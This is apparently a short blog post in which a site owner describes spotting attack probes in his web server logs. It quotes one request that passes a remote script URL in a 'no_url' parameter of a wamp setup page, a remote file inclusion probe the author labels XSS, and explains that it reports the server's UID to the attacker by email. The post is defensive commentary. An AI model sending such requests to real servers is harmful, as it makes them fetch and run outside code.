You never know what treasures you might find

I always keep a pretty close eye on on my logs. Especially when I have a relatively new site like Seocracy.com or Sharetactic.com.

I am usually keeping on eye on the logs to look out for errors or glitches or other unexpected behavior.

Sometimes, while scanning my logs, I see some pretty interesting stuff! Over the last two days, Ive been watching several groups of people trying to direct some XSS attacks at my webserver. I'm sure I'm not alone!

Take this one for instance:

Referer: -
Agent: libwww-perl/5.803

../wamp_dir/setup/yesno.phtml?no_url=http://rpgnet.com/newrpgnet/c.txt?

When these kinds of gems show up in your logs, take some time to do some detective work & you will usually learn something.

By seeing this entry in my log, I know that someone is looking for a way to inject some code into my website by exploiting a pre-existing vulnerability (which my server doesnt have, hence the 404 error).

By going to the URL in the request: http://rpgnet.com/newrpgnet/c.txt we can see that this attacker is simply doing some reconnaissance on websites that might be vulnerable.

When this request is made on a vulnerable site, the code will run and will get the current UID it is running under and will email the intruder with the information so that he knows to add it to his list of websites that are open to attack in the future.

This isn't the most exciting example of this kind of thing, as this type of script he is trying to execute is really quite simple. But nevertheless, it goes to show you all that it pays to keep an eye on your logs and see whats happening behind the scenes.